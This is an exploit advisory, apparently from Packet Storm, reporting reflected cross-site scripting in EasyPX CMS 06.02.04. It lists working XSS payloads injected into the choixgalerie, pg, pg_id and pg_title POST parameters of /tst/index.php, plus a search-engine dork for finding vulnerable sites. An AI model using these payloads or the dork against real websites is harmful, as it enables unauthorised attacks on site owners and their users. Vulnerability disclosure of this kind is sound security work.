Share
## https://sploitus.com/exploit?id=PACKETSTORM:174138
====================================================================================================================================
| # Title : EasyPX CMS V06.02.04 XSS Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit) |
| # Vendor : http://www.domphp.com/ |
| # Dork : Site fonctionnant sous Easy PX 41 CMOS 06.02.04 © 2004 - 2006 Freeware |
====================================================================================================================================
poc :
[+] Dorking İn Google Or Other Search Enggine.
[+] This vulnerability affects : /tst/index.php
URL encoded POST input choixgalerie was set to 1" onmouseover=prompt(951655) bad="
The input is reflected inside a tag parameter between double quotes.
URL encoded POST input pg was set to system/fnc/readpg.php'"()&%<ScRiPt >prompt(940614)</ScRiPt>
URL encoded POST input pg was set to modules/login/inscription.php'"()&%<ScRiPt >prompt(904457)</ScRiPt>
URL encoded POST input pg_id was set to http://www.generation-libre.com/index2.php%3foption%3dcom_rss'"()&%<ScRiPt >prompt(920742)</ScRiPt>
URL encoded POST input pg_title was set to RSS'"()&%<ScRiPt >prompt(963497)</ScRiPt>
Greetings to :=========================================================================================================================
jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |
=======================================================================================================================================